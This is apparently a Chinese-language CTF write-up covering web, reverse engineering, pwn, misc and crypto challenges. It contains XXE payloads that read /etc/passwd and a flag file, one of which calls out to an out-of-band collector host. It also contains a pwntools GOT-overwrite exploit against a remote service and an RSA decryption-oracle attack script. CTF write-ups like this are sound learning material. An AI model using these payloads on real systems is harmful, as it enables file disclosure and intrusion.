web-1
题目描述:只需一键,Flag就在你眼前!
Ctrl+U直接出
web-2
题目描述:小明做的网站看似很安全,但是它好像开启了某个不安全的配置
敏感目录扫描无果,手动排查,根据报错是java的后端(springboot)
环境出网,能解析xml,有没有回显不知道,xxe包的。
<?xml version='1.0' encoding="UTF-8"?>
<!DOCTYPE hacker[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % myurl SYSTEM "http://Jay17.6c48yi2g.requestrepo.com">
%myurl;
]>
<root>
1
</root>
之前做了java的xxe,留了payload:
来自这篇文章:https://github.com/bfengj/CTF/blob/main/Web/java/XXE/Java%E4%B8%AD%E7%9A%84XXE.md
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message>any text</message>
啥都好,就是环境有点问题
重开环境
re-1
IDA打开,直接找string,找到关键提示Congratulations!等,追踪到函数,发现main函数入口
简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到
先逆key,追踪key和key1,得到值,写解密脚本
def initialize_key_stream(state, key_seed):
    """Run the RC4 key-scheduling algorithm (KSA) over *state* in place.

    *state* is first reset to the identity permutation 0..255 via slice
    assignment (so a list of any length, including an empty one, works) and
    is then permuted under *key_seed*, a bytes-like object whose bytes are
    cycled as needed. An empty *key_seed* raises ZeroDivisionError because
    the byte index is taken modulo its length. Returns None; the caller
    hands the same list to the keystream routine afterwards.
    """
    seed_len = len(key_seed)
    state[:] = range(256)
    swap_at = 0
    for slot in range(256):
        swap_at = (swap_at + state[slot] + key_seed[slot % seed_len]) % 256
        state[slot], state[swap_at] = state[swap_at], state[slot]
def encrypt_decrypt(state, data):
    """XOR *data* with the RC4 keystream drawn from *state* (the PRGA).

    The transform is a plain XOR, so one function serves for both
    directions. *state* is advanced in place on every byte, which means a
    second call on the same list continues the keystream rather than
    restarting it; decrypting requires a freshly scheduled state. Returns a
    new bytearray and leaves *data* untouched.
    """
    i = j = 0
    output = bytearray(data)
    for position, plain_byte in enumerate(data):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        output[position] = plain_byte ^ state[(state[i] + state[j]) % 256]
    return output
def process_data(data, key_seed):
    """Encrypt or decrypt *data* with RC4 under *key_seed*.

    A fresh 256-entry state is built and scheduled for every call, so calls
    are independent of each other. Returns the transformed bytearray.
    """
    rc4_state = list(range(256))
    initialize_key_stream(rc4_state, key_seed)
    return encrypt_decrypt(rc4_state, data)
# Reproduce the binary's crypt1 step: the constant key material is run
# through RC4 under the seed to yield the key used for the flag cipher.
data = b"ban_debug!"
key_seed = b"keykey"
encrypted_data = process_data(data, key_seed)
print("Encrypted key:", encrypted_data)
得到key: b'i\rZ\xb2@\xea\x19?/j',解密cipher的脚本如下
def initialize_key_stream(state, key):
    """RC4 key scheduling (KSA) applied to *state* in place.

    The first 256 entries of *state* are overwritten one by one with 0..255
    (so *state* must already hold at least 256 elements) and then permuted
    under *key*, whose bytes are cycled; an empty *key* raises
    ZeroDivisionError from the modulo on its length. Returns None.
    """
    key_len = len(key)
    for slot in range(256):
        state[slot] = slot
    swap_at = 0
    for slot in range(256):
        swap_at = (swap_at + state[slot] + key[slot % key_len]) % 256
        state[slot], state[swap_at] = state[swap_at], state[slot]
def encrypt_data(state, data):
    """Subtract the RC4 keystream from every byte of *data*, modulo 256.

    This is the additive variant of the cipher (ciphertext byte =
    plaintext byte - keystream byte mod 256) and the inverse of
    decrypt_data. *state* is advanced in place. Returns a new bytearray;
    *data* is not modified.
    """
    i = j = 0
    out = bytearray(data)
    for pos, value in enumerate(data):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out[pos] = (value - state[(state[i] + state[j]) % 256]) % 256
    return out
def decrypt_data(state, ciphertext):
    """Add the RC4 keystream to every byte of *ciphertext*, modulo 256.

    Inverse of encrypt_data (plaintext byte = ciphertext byte + keystream
    byte mod 256). *state* is advanced in place. Returns a new bytearray;
    *ciphertext* is not modified.
    """
    i = j = 0
    out = bytearray(ciphertext)
    for pos, value in enumerate(ciphertext):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out[pos] = (value + state[(state[i] + state[j]) % 256]) % 256
    return out
# Key recovered from the crypt1 step above; the cipher bytes are the
# flag blob lifted from the binary, written one source row per line so
# they can be checked against the disassembly.
key = b'i\rZ\xb2@\xea\x19?/j'
ciphertext = bytes.fromhex(
    "4e 47 38 47 62 0a "
    "79 6a 03 66 c0 69 "
    "8d 1c 84 0f 54 4a "
    "3b 08 e3 30 4f b9 "
    "6c ab 36 24 52 81 "
    "cf"
)
state = list(range(256))
initialize_key_stream(state, key)
decrypted_data = decrypt_data(state, ciphertext)
print("Decrypted flag:", decrypted_data.decode())
re-2
先用010 Editor将CTF修改为UPX
然后用upx4.2.3脱壳
然后下完断点后输入27个字符动调查看v4找到flag
pwn-1
name能覆盖到password1的指针,修改其使其指向__isoc99_scanf的got,然后在输入password1时将其篡改为提供的后门地址即可
from pwn import *
# Exploit for the unchecked name copy described above: the overlong name
# overwrites the adjacent password1 pointer, turning the password write
# into an arbitrary write over a GOT slot. Root cause is the missing
# length check on the name field; a bounded read or stack canary plus
# RELRO would stop this.
context.log_level="debug"
elf=ELF("./Wal1et")
io=remote("47.100.12.80",30786)
#io=process("./Wal1et")
#io.recvuntil("2.EXIT")
io.sendline("1")
io.recvuntil("Show me your name :")
printf_got=elf.got["printf"]  # only printed below; not part of the payload
__isoc99_scanf_got=elf.got["__isoc99_scanf"]
print(hex(printf_got))
# NOTE(review): str + bytes (p32 returns bytes) raises TypeError on
# Python 3; this script appears to have been run under Python 2 pwntools.
io.sendline("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaab"+p32(__isoc99_scanf_got))
#gdb.attach(io)
#pause()
io.recvuntil("password :")
io.sendline(str(0x804872A))  # the backdoor address named in the write-up, written into the redirected slot
io.interactive()
misc-1
png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码
得到隐藏数据
搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示
直接搜这个解密网站 https://sekao.net/pixeljihad/ 解密后得到flag
crypto-1
import websocket
import json
from binascii import *
from Crypto.Util.number import *
# Challenge endpoint from the write-up; the connection is module-level
# because the helper functions below share it.
url1="ws://101.132.170.0:31898"
ws=websocket.create_connection(url1)
t1=ws.recv()  # first message after connect (presumably a banner); unused afterwards
# print(t1)
# ws.send(json.dumps({"cmd": "get_flag"}))
# ws.send("help")
def get_flag():
    """Ask the service for the flag ciphertext and return it as an int.

    Sends the ``get_flag`` command over the shared websocket ``ws`` and
    parses the hex reply as a big-endian integer.
    """
    ws.send(json.dumps({"cmd": "get_flag"}))
    reply = str(ws.recv())
    return int.from_bytes(unhexlify(reply), "big")
def dec(data):
    """Submit the integer *data* to the service's decryption command.

    *data* is sent as a bare hex string (no ``0x`` prefix); the raw reply
    from the shared websocket ``ws`` is returned unparsed.
    """
    request = {"cmd": "dec", "data": hex(data)[2:]}
    ws.send(json.dumps(request))
    return ws.recv()
def enc(data):
    """Submit the integer *data* to the service's encryption command.

    *data* is sent as a bare hex string (no ``0x`` prefix); the raw reply
    from the shared websocket ``ws`` is returned unparsed.
    """
    request = {"cmd": "enc", "data": hex(data)[2:]}
    ws.send(json.dumps(request))
    return ws.recv()
c=get_flag()  # flag ciphertext as an int
print(f"c={c}")
e=65537
# Recover n from the encryption oracle: the service appears to answer any
# input it considers too large with an "args" error, so bisecting over
# [1, 2**2048] on accept/reject converges on the largest accepted value.
left,right=1,2**2048
while left<right:
    mid=(left+right)>>1
    result=enc(mid)
    if "args" in result:  # rejected: mid is too large
        right=mid-1
    else:  # accepted: mid is below the limit
        left=mid
    # hand-rolled tie-break for the last two candidates (indentation
    # reconstructed; it can only fire while the loop is still running)
    if right-left==1:
        if "arg" in enc(right):
            right=left
        else:
            left=right
print(left,right)
n=left+1  # presumably the modulus, i.e. the oracle rejects values >= n
print(f"n={n}")
# Blinding: the decryption oracle applies no padding or format check, so
# decrypting c*2^e yields 2*m mod n — textbook RSA is multiplicatively
# malleable, which is exactly what OAEP/PKCS#1 checks exist to prevent.
# NOTE(review): pow(i,e) without a modulus builds a ~65537-bit integer;
# pow(i,e,n) gives the same residue far more cheaply. range(2,3) yields
# only i == 2.
for i in range(2,3):
    c_tmp=c*pow(i,e)%n
    m=dec(c_tmp)
    print(m)
    result1=bytes_to_long(unhexlify(m))
    # halve 2m mod n: if 2m < n the value is even; otherwise n (odd for
    # RSA) was subtracted once, so add it back before halving
    if result1%2==0:
        print(long_to_bytes(result1//2))
    else:
        print(long_to_bytes((result1+n)//2))